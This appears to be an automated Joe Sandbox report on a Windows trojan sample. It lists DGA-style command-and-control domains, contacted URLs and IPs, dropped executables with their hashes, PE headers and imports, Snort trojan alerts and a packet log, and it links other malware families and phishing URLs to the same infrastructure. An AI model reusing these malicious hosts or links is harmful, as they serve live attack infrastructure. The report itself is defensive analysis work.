womanbefore.net	unknown	unknown	true		unknown
experiencespring.net	unknown	unknown	true		unknown
beginfound.net	unknown	unknown	true		unknown
fightdevice.net	unknown	unknown	true		unknown
knownsuccess.net	unknown	unknown	true		unknown
knownbanker.net	unknown	unknown	true		unknown
freshsuccess.net	unknown	unknown	true		unknown
experiencebanker.net	unknown	unknown	true		unknown
knownspring.net	unknown	unknown	true		unknown
smokedevice.net	unknown	unknown	true		unknown
smokebefore.net	unknown	unknown	true		unknown
waterspring.net	unknown	unknown	true		unknown
waterbanker.net	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://partybefore.net/index.php	true	Avira URL Cloud: safe	unknown
http://crowdsuccess.net/index.php	false	Avira URL Cloud: malware	unknown
http://crowdspring.net/index.php	false	Avira URL Cloud: safe	unknown
http://waterlanguage.net/index.php	false	Avira URL Cloud: malware	unknown
http://beginsuccess.net/index.php	false	Avira URL Cloud: safe	unknown
http://freshspring.net/index.php	false	Avira URL Cloud: safe	unknown
http://thoughtlanguage.net/index.php	true	Avira URL Cloud: safe	unknown
http://followsuccess.net/index.php	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.softaculous.com/images/webuzo.gif	aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.webuzo.com	aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false		high
http://asap.timeandfreedomteam.com/index.php	aoxsaykytfn.exe, 00000002.00000002.632536093.0000000000E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
69.194.230.123	experiencesuccess.net	United States	33494	IHNETUS	false
208.100.26.245	thoughtlanguage.net	United States	32748	STEADFASTUS	true
72.26.218.86	partybefore.net	United States	29791	VOXEL-DOT-NETUS	true
72.1.32.168	followsuccess.net	United States	16509	AMAZON-02US	false
34.102.136.180	beginsuccess.net	United States	15169	GOOGLEUS	false
185.230.63.171	waterlanguage.net	Israel	58182	WIX_COMIL	false
52.219.109.72	freshspring.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1287780
Start date and time:	2023-08-08 16:14:51 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	zGIDlWIotR.exe
Original Sample Name:	9db238125c4edde646d3059cce9b20142026abdaf38f9a6e61ce7c370a117772.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/6@88/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 72.7% (good quality ratio 70.4%) Quality average: 83.9% Quality standard deviation: 23.9%
HCA Information:	Successful, ratio: 94% Number of executed functions: 32 Number of non-executed functions: 88
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.100.26.245	INPeNMqCjF.exe	Get hash	malicious	Unknown	Browse	thoughtlanguage.net/index.php
	winsvc.exe	Get hash	malicious	Phorpiex	Browse	aeiziaezieidiebg.biz/t.php?new=1
	winsvc.exe	Get hash	malicious	Phorpiex	Browse	iuefgauiaiduihgs.in/t.php?new=1
	B3birwnNS3.exe	Get hash	malicious	FormBook	Browse	www.tradelength.net/oudr/?m2=bFN8nn_py&-Zs=XJVlAyFaulUytt/lhcSNfsB4Y4SnmSDIWo3ai+hahrwvNcZYZ8Xw+YpCNEk+OqTrTWnU
	T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe	Get hash	malicious	FormBook	Browse	www.7dkjhk.com/ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcz
	Akbank_Ekstre_20191102_073809_405251-PDF.com.exe	Get hash	malicious	FormBook	Browse	www.7dkjhk.com/ghii/?gXaj8V=el6O6QfXWJC5IcEqZJOmOQA1Exr6OMEjtYFmnAPhTiUm5LiBD7pHZMwmJ3xfiSpQzup0R7I9jNpZRQ1DLLwoO0t0Lbzvqq+phg==&D-=o7lM_tn4_0HKLAP
	captain.exe	Get hash	malicious	FormBook	Browse	www.7dkjhk.com/ghii/?5B=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&Z-y-ON=FXxQJAlmPf
	oYXqTjvVjI.exe	Get hash	malicious	Unknown	Browse	doublemayor.net/index.php
	swift.exe	Get hash	malicious	FormBook	Browse	www.1cpi1s0u7qcuj1xus5cg1fezo1k.com/mi08/?d48PeNm0=VwWTCAjEpuWEA5RuX+d7GhOs2Efxl9ewnEr0ktY8FmRxHFc1tEZPr+ktNcyMnsLQG4Vq&_l=6ln0
	el4tq9Mp5l.exe	Get hash	malicious	Unknown	Browse	oftenletter.net/index.php
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	lyvyxor.com/login.php
	tLIQS3Pca5.exe	Get hash	malicious	Unknown	Browse	auqqjodij.info/
	CgFJBVFNlg.exe	Get hash	malicious	Unknown	Browse	baabhb.info/
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	lyvyxor.com/login.php
	4oV2svIvyn.exe	Get hash	malicious	Unknown	Browse	hsnktjroamx.info/
	iN9u7DdJv4.exe	Get hash	malicious	Simda Stealer	Browse	lyvyxor.com/login.php
	SecuriteInfo.com.Trojan.GenericKD.49372806.12532.exe	Get hash	malicious	FormBook	Browse	www.implemedescribed.com/vweq/?m0DLR=-ZBtXxNP5teL6l&bXtd4V=omFKLliGTqolg6372U+wHWfrECDaZrjC9Kt3TVPxdWlN3UhwS3uaY3BqgzkvXi2UJ/nU
	Microsoft Office Project 2007.exe	Get hash	malicious	Unknown	Browse	hsnktjroamx.info/
	http://a.e30fdb334b44b54aa3715baa75ba886e.com/get	Get hash	malicious	Unknown	Browse	a.e30fdb334b44b54aa3715baa75ba886e.com/favicon.ico
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	lyvyxor.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
thoughtlanguage.net	INPeNMqCjF.exe	Get hash	malicious	Unknown	Browse	208.100.26.245
waterlanguage.net	INPeNMqCjF.exe	Get hash	malicious	Unknown	Browse	185.230.63.171

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IHNETUS	SOA-DHL_COSU6355297070.exe	Get hash	malicious	AgentTesla	Browse	174.136.29.110
	rBankTransferAdvice-REF310720230193.exe	Get hash	malicious	AgentTesla	Browse	174.136.29.110
	863037-Remittance_Copy.exe	Get hash	malicious	AgentTesla	Browse	174.136.29.110
	rJUNESOA062023=USD1,256.86.exe	Get hash	malicious	AgentTesla	Browse	174.136.29.110
	KrAGtlhfH1.elf	Get hash	malicious	Mirai	Browse	67.222.108.114
	33cWz2DNq2.elf	Get hash	malicious	Mirai	Browse	216.193.245.90
	https://grupoenergua.com/seb/?smtpneaurie	Get hash	malicious	Unknown	Browse	174.136.25.35
	T8p2jmsjqo.elf	Get hash	malicious	Mirai	Browse	69.194.228.68
	Vel.html	Get hash	malicious	Qbot	Browse	72.34.58.218
	Aut.html	Get hash	malicious	Unknown	Browse	72.34.58.218
	file.exe	Get hash	malicious	AgentTesla	Browse	174.136.29.110
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=4292342187212&EyeblasterID=1086486580&clk=2&ctick=21342&rtu=https%3A%2F%2Fna2signing.web.app/ggrFe5shaBM2x0qgrFe5Fe5ndWO3k17s3RWO3rpdy9s3RWO3BM2	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160
	https://na2signing.web.app/davi2Pddy9radwFe5llx0qspwdy9s3RWO3BM2	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=169213456875621&EyeblasterID=1086486580&clk=21&ctick=56316&rtu=https%3A%2F%2Fna2signing.web.app/davi2Pddy9radwFe5llx0qspwdy9s3RWO3BM2	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=239213449874921&EyeblasterID=1086486580&clk=21&ctick=49323&rtu=https%3A%2F%2Fna2signing.web.app/raphaFe5ldy9pFe5rrFe5k17x0qsavFe5k17hFe5s3Rhi2PldrFe5ndy9WO3rg	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160
	j9rM5v9A2g.elf	Get hash	malicious	Mirai	Browse	67.222.108.116
	https://awin1.com/cread.php?awinmid=12045&awinaffid=&ued=&clickref=td1_adid:TWSales&p=http%3A%2F%2Fm.bqd.us%2FF4zdun2Tvhya51sralabd070h3rg	Get hash	malicious	Unknown	Browse	69.194.236.160
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=20&EyeblasterID=1086486580&clk=1&ctick=521821252&rtu=https%3A%2F%2Fconcur2.web.app%2Fboba51gmaild07r9s0h3nW1	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=20&EyeblasterID=1086486580&clk=1&ctick=521821252&rtu=https%3A%2F%2Fconcur2.web.app%2Fbob51ppgd07r9s0h3nW1	Get hash	malicious	Unknown	Browse	69.194.236.160
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=20&EyeblasterID=1086486580&clk=1&ctick=521821252&rtu=https%3A%2F%2Fconcur2.web.app%2Fbob51googled07r9s0h3nW1	Get hash	malicious	HTMLPhisher	Browse	69.194.236.160

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\helrrxxyrxmppnn\oym5yamsp1r

Download File

Process:	C:\Users\user\Desktop\zGIDlWIotR.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:QeF:Qk
MD5:	F16955243CFF9675D32179E3ED384E07
SHA1:	8E3639FB0BA2C913025B9D3BDDBDE1C73D9116A1
SHA-256:	1A19A9774AB882AD76DE2F7F6301F093D86EAC3F0741940F12256796033A2371
SHA-512:	162895DADC44B02748B65931E13B96C49D74D7A31B7883F903BEE2CCF58547A949A19BCA2302EE606C0152CEE9B176E6B640E1B35A8F44396B4299C9FC860647
Malicious:	false
Reputation:	low
Preview:	i.hi..

C:\helrrxxyrxmppnn\aoxsaykytfn.exe

Download File

Process:	C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339968
Entropy (8bit):	6.862447089374556
Encrypted:	false
SSDEEP:	6144:X6114h08ng9aChe2+WwqlhhCmMFfUskeH8c87xv+bQYHKVzWTPrvr:q1142sChe2jhCFfvNH8c87x2bDKQ
MD5:	89333738292AE456B34A0027E057D8F5
SHA1:	C54568B92330B16953DE4D0F922CA33D42A6DB2A
SHA-256:	9DB238125C4EDDE646D3059CCE9B20142026ABDAF38F9A6E61CE7C370A117772
SHA-512:	972110065BF7188D4D32A4E17F34229EB18817CADBD30470BA1CD2C07719B5D0603B9915857CA4BF8BD4F5962DAF264C06947B18173ADBE38B7D130116692DEE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...pU]U.....................<...............0....@.......................................@.................................D...P............................0...K..................................x...@............0...............................text...]........................... ..`.rdata......0......."..............@..@.data....H..........................@....reloc...L...0...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\helrrxxyrxmppnn\aw1j2ylb8pebwqkliimle.exe

Download File

Process:	C:\Users\user\Desktop\zGIDlWIotR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339968
Entropy (8bit):	6.862447089374556
Encrypted:	false
SSDEEP:	6144:X6114h08ng9aChe2+WwqlhhCmMFfUskeH8c87xv+bQYHKVzWTPrvr:q1142sChe2jhCFfvNH8c87x2bDKQ
MD5:	89333738292AE456B34A0027E057D8F5
SHA1:	C54568B92330B16953DE4D0F922CA33D42A6DB2A
SHA-256:	9DB238125C4EDDE646D3059CCE9B20142026ABDAF38F9A6E61CE7C370A117772
SHA-512:	972110065BF7188D4D32A4E17F34229EB18817CADBD30470BA1CD2C07719B5D0603B9915857CA4BF8BD4F5962DAF264C06947B18173ADBE38B7D130116692DEE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...pU]U.....................<...............0....@.......................................@.................................D...P............................0...K..................................x...@............0...............................text...]........................... ..`.rdata......0......."..............@..@.data....H..........................@....reloc...L...0...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\helrrxxyrxmppnn\lxugwbfrq.exe

Download File

Process:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339968
Entropy (8bit):	6.862447089374556
Encrypted:	false
SSDEEP:	6144:X6114h08ng9aChe2+WwqlhhCmMFfUskeH8c87xv+bQYHKVzWTPrvr:q1142sChe2jhCFfvNH8c87x2bDKQ
MD5:	89333738292AE456B34A0027E057D8F5
SHA1:	C54568B92330B16953DE4D0F922CA33D42A6DB2A
SHA-256:	9DB238125C4EDDE646D3059CCE9B20142026ABDAF38F9A6E61CE7C370A117772
SHA-512:	972110065BF7188D4D32A4E17F34229EB18817CADBD30470BA1CD2C07719B5D0603B9915857CA4BF8BD4F5962DAF264C06947B18173ADBE38B7D130116692DEE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...pU]U.....................<...............0....@.......................................@.................................D...P............................0...K..................................x...@............0...............................text...]........................... ..`.rdata......0......."..............@..@.data....H..........................@....reloc...L...0...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\helrrxxyrxmppnn\oym5yamsp1r

Download File

Process:	C:\Users\user\Desktop\zGIDlWIotR.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.2516291673878226
Encrypted:	false
SSDEEP:	3:QeF:Qk
MD5:	F16955243CFF9675D32179E3ED384E07
SHA1:	8E3639FB0BA2C913025B9D3BDDBDE1C73D9116A1
SHA-256:	1A19A9774AB882AD76DE2F7F6301F093D86EAC3F0741940F12256796033A2371
SHA-512:	162895DADC44B02748B65931E13B96C49D74D7A31B7883F903BEE2CCF58547A949A19BCA2302EE606C0152CEE9B176E6B640E1B35A8F44396B4299C9FC860647
Malicious:	false
Reputation:	low
Preview:	i.hi..

C:\helrrxxyrxmppnn\zqzgdqiac

Download File

Process:	C:\helrrxxyrxmppnn\aoxsaykytfn.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:fn:f
MD5:	75CA9E9622CC12EEC8E8042339F56B13
SHA1:	0D15FCC7ABD11EF838BDDA19E6DBA37D7B83FA72
SHA-256:	4A8A32F1124E4424446B2C91679839833A5E377908DD237D72816F89A9F181B9
SHA-512:	ECBC4D2809142B34260D6F9AD04E1AE36CC37C9DEB3F60F80B726E531FB7E51E01F01A4F6EC65B5787D942A1F673875C85424A0F8FFB91A9DCF6D1E72B6D39DD
Malicious:	false
Reputation:	low
Preview:	..B,

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.862447089374556
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	zGIDlWIotR.exe
File size:	339'968 bytes
MD5:	89333738292ae456b34a0027e057d8f5
SHA1:	c54568b92330b16953de4d0f922ca33d42a6db2a
SHA256:	9db238125c4edde646d3059cce9b20142026abdaf38f9a6e61ce7c370a117772
SHA512:	972110065bf7188d4d32a4e17f34229eb18817cadbd30470ba1cd2c07719b5d0603b9915857ca4bf8bd4f5962daf264c06947b18173adbe38b7d130116692dee
SSDEEP:	6144:X6114h08ng9aChe2+WwqlhhCmMFfUskeH8c87xv+bQYHKVzWTPrvr:q1142sChe2jhCFfvNH8c87x2bDKQ
TLSH:	44749E28FAC0C176C5A260749129D7B3CBBD7470676964CBBBC626760E796D0EA3130F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...pU]U...................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41e3e9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x555D5570 [Thu May 21 03:48:00 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	285ef1ee25868adb73e72303fd540efd

Entrypoint Preview

Instruction
call 00007F9504B58438h
jmp 00007F9504B4C2FEh
mov eax, ecx
and dword ptr [eax+04h], 00000000h
mov dword ptr [eax], 00448688h
mov byte ptr [eax+08h], 00000000h
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, ecx
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], 00448688h
mov ecx, dword ptr [ecx]
mov dword ptr [eax+04h], ecx
mov byte ptr [eax+08h], 00000000h
pop ebp
retn 0008h
mov eax, dword ptr [ecx+04h]
test eax, eax
jne 00007F9504B4C477h
mov eax, 00448690h
ret
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
push edi
mov edi, ecx
je 00007F9504B4C49Fh
push esi
push dword ptr [ebp+08h]
call 00007F9504B4E360h
lea esi, dword ptr [eax+01h]
push esi
call 00007F9504B4ABEBh
pop ecx
pop ecx
mov dword ptr [edi+04h], eax
test eax, eax
je 00007F9504B4C483h
push dword ptr [ebp+08h]
push esi
push eax
call 00007F9504B58460h
add esp, 0Ch
mov byte ptr [edi+08h], 00000001h
pop esi
pop edi
pop ebp
retn 0004h
mov edi, edi
push esi
mov esi, ecx
cmp byte ptr [esi+08h], 00000000h
je 00007F9504B4C47Bh
push dword ptr [esi+04h]
call 00007F9504B4AB3Fh
pop ecx
and dword ptr [esi+04h], 00000000h
mov byte ptr [esi+08h], 00000000h
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00448688h
mov byte ptr [esi+08h], 00000000h
push dword ptr [eax]
call 00007F9504B4C3F7h
mov eax, esi
pop esi
pop ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4c444	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x53000	0x4bf4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4b378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x43000	0x2a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x41c5d	0x41e00	False	0.5418865630929791	data	6.702497991083012	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x43000	0xa2ea	0xa400	False	0.6382431402439024	data	6.436463517586278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4e000	0x48a8	0x1c00	False	0.4349888392857143	data	4.35226459113849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x53000	0x4c8c	0x4e00	False	0.7708333333333334	data	6.762220553067932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
GDI32.dll	GetPixelFormat, GetDeviceCaps, GetStretchBltMode, GetNearestPaletteIndex, SetTextCharacterExtra, GetMetaRgn, GetObjectType, GetTextAlign, GetMapMode, GetFontUnicodeRanges, GetBkColor, GetFontLanguageInfo, SetPixel, GetTextCharsetInfo, UpdateColors, SetTextAlign, SetTextColor, SetSystemPaletteUse, SetTextJustification, GetRandomRgn, GetTextCharset, GetClipRgn, GetTextCharacterExtra, GetTextColor, GetDCBrushColor
USER32.dll	IsWindowUnicode, GetDlgItemInt, CheckDlgButton, GetMenuItemID, GetMenuContextHelpId, SendMessageA, GetScrollPos, GetDialogBaseUnits, GetMenuItemCount, GetWindowDC, SetDlgItemTextA, GetWindowContextHelpId, BeginPaint, GetMenu, GetDlgItem, LoadIconA, GetMenuState, GetWindowLongA, GetInputState, ShowWindow, DrawTextA, PostMessageA, MoveWindow, GetMenuCheckMarkDimensions, EndPaint, GetDC, GetForegroundWindow, SetWindowTextA, EndDialog, WindowFromDC, GetPropA, GetKeyboardType, IsWindowEnabled, EnableWindow
KERNEL32.dll	SetEnvironmentVariableA, CompareStringW, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, CreateFileW, HeapReAlloc, GetStringTypeW, HeapSize, WriteConsoleW, LCMapStringW, GetTimeZoneInformation, ReadFile, MultiByteToWideChar, SetEndOfFile, SetStdHandle, GetDriveTypeW, Sleep, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, FreeLibrary, SetConsoleCtrlHandler, RtlUnwind, SetHandleCount, EnterCriticalSection, FatalAppExitA, GetProcAddress, MoveFileA, GetLastError, WriteFile, SizeofResource, DeleteFileA, GlobalAlloc, GetModuleHandleA, LocalFlags, QueryPerformanceCounter, GlobalHandle, FlushFileBuffers, GetCurrentProcessId, GetDriveTypeA, LoadResource, FindResourceA, GetProcessHeap, GetCurrentProcess, SetFilePointer, GetTickCount, GetStdHandle, LockResource, GetVersion, IsDebuggerPresent, GetCurrentThreadId, GlobalFlags, IsProcessorFeaturePresent, CloseHandle, CreateThread, GetSystemTimeAsFileTime, UnhandledExceptionFilter, SetUnhandledExceptionFilter, EncodePointer, DecodePointer, TerminateProcess, HeapFree, HeapAlloc, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FindFirstFileExA, GetModuleHandleW, ExitProcess, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, HeapCreate, HeapDestroy, GetModuleFileNameW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, GetCurrentThread, GetFullPathNameA, GetFileInformationByHandle, PeekNamedPipe, GetFileType, CreateFileA, GetCurrentDirectoryW, SetCurrentDirectoryW, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
72.26.218.86192.168.2.380497022037771 08/08/23-16:15:53.474986	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49702	72.26.218.86	192.168.2.3
8.8.8.8192.168.2.353573872811542 08/08/23-16:16:02.561982	UDP	2811542	ETPRO TROJAN Possible Tinba DGA NXDOMAIN Responses (net)	53	57387	8.8.8.8	192.168.2.3
192.168.2.3208.100.26.24549700802815568 08/08/23-16:15:51.978521	TCP	2815568	ETPRO TROJAN Terse HTTP 1.0 Request Possible Nivdort	49700	80	192.168.2.3	208.100.26.245
8.8.8.8192.168.2.353600882018316 08/08/23-16:15:54.787837	UDP	2018316	ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses	53	60088	8.8.8.8	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2023 16:15:51.860589027 CEST	49700	80	192.168.2.3	208.100.26.245
Aug 8, 2023 16:15:51.978277922 CEST	80	49700	208.100.26.245	192.168.2.3
Aug 8, 2023 16:15:51.978462934 CEST	49700	80	192.168.2.3	208.100.26.245
Aug 8, 2023 16:15:51.978521109 CEST	49700	80	192.168.2.3	208.100.26.245
Aug 8, 2023 16:15:52.096178055 CEST	80	49700	208.100.26.245	192.168.2.3
Aug 8, 2023 16:15:52.096251011 CEST	80	49700	208.100.26.245	192.168.2.3
Aug 8, 2023 16:15:52.096271038 CEST	80	49700	208.100.26.245	192.168.2.3
Aug 8, 2023 16:15:52.096333981 CEST	49700	80	192.168.2.3	208.100.26.245
Aug 8, 2023 16:15:52.096398115 CEST	49700	80	192.168.2.3	208.100.26.245
Aug 8, 2023 16:15:52.131567001 CEST	49701	80	192.168.2.3	185.230.63.171
Aug 8, 2023 16:15:52.173095942 CEST	80	49701	185.230.63.171	192.168.2.3
Aug 8, 2023 16:15:52.173253059 CEST	49701	80	192.168.2.3	185.230.63.171
Aug 8, 2023 16:15:52.173530102 CEST	49701	80	192.168.2.3	185.230.63.171
Aug 8, 2023 16:15:52.213999033 CEST	80	49700	208.100.26.245	192.168.2.3
Aug 8, 2023 16:15:52.215080976 CEST	80	49701	185.230.63.171	192.168.2.3
Aug 8, 2023 16:15:52.215102911 CEST	80	49701	185.230.63.171	192.168.2.3
Aug 8, 2023 16:15:52.215118885 CEST	80	49701	185.230.63.171	192.168.2.3
Aug 8, 2023 16:15:52.215179920 CEST	49701	80	192.168.2.3	185.230.63.171
Aug 8, 2023 16:15:52.215226889 CEST	49701	80	192.168.2.3	185.230.63.171
Aug 8, 2023 16:15:52.256697893 CEST	80	49701	185.230.63.171	192.168.2.3
Aug 8, 2023 16:15:53.237236977 CEST	49702	80	192.168.2.3	72.26.218.86
Aug 8, 2023 16:15:53.348197937 CEST	80	49702	72.26.218.86	192.168.2.3
Aug 8, 2023 16:15:53.352063894 CEST	49702	80	192.168.2.3	72.26.218.86
Aug 8, 2023 16:15:53.362957954 CEST	49702	80	192.168.2.3	72.26.218.86
Aug 8, 2023 16:15:53.473948956 CEST	80	49702	72.26.218.86	192.168.2.3
Aug 8, 2023 16:15:53.474986076 CEST	80	49702	72.26.218.86	192.168.2.3
Aug 8, 2023 16:15:53.475527048 CEST	80	49702	72.26.218.86	192.168.2.3
Aug 8, 2023 16:15:53.475610018 CEST	49702	80	192.168.2.3	72.26.218.86
Aug 8, 2023 16:15:53.476403952 CEST	49702	80	192.168.2.3	72.26.218.86
Aug 8, 2023 16:15:53.587063074 CEST	80	49702	72.26.218.86	192.168.2.3
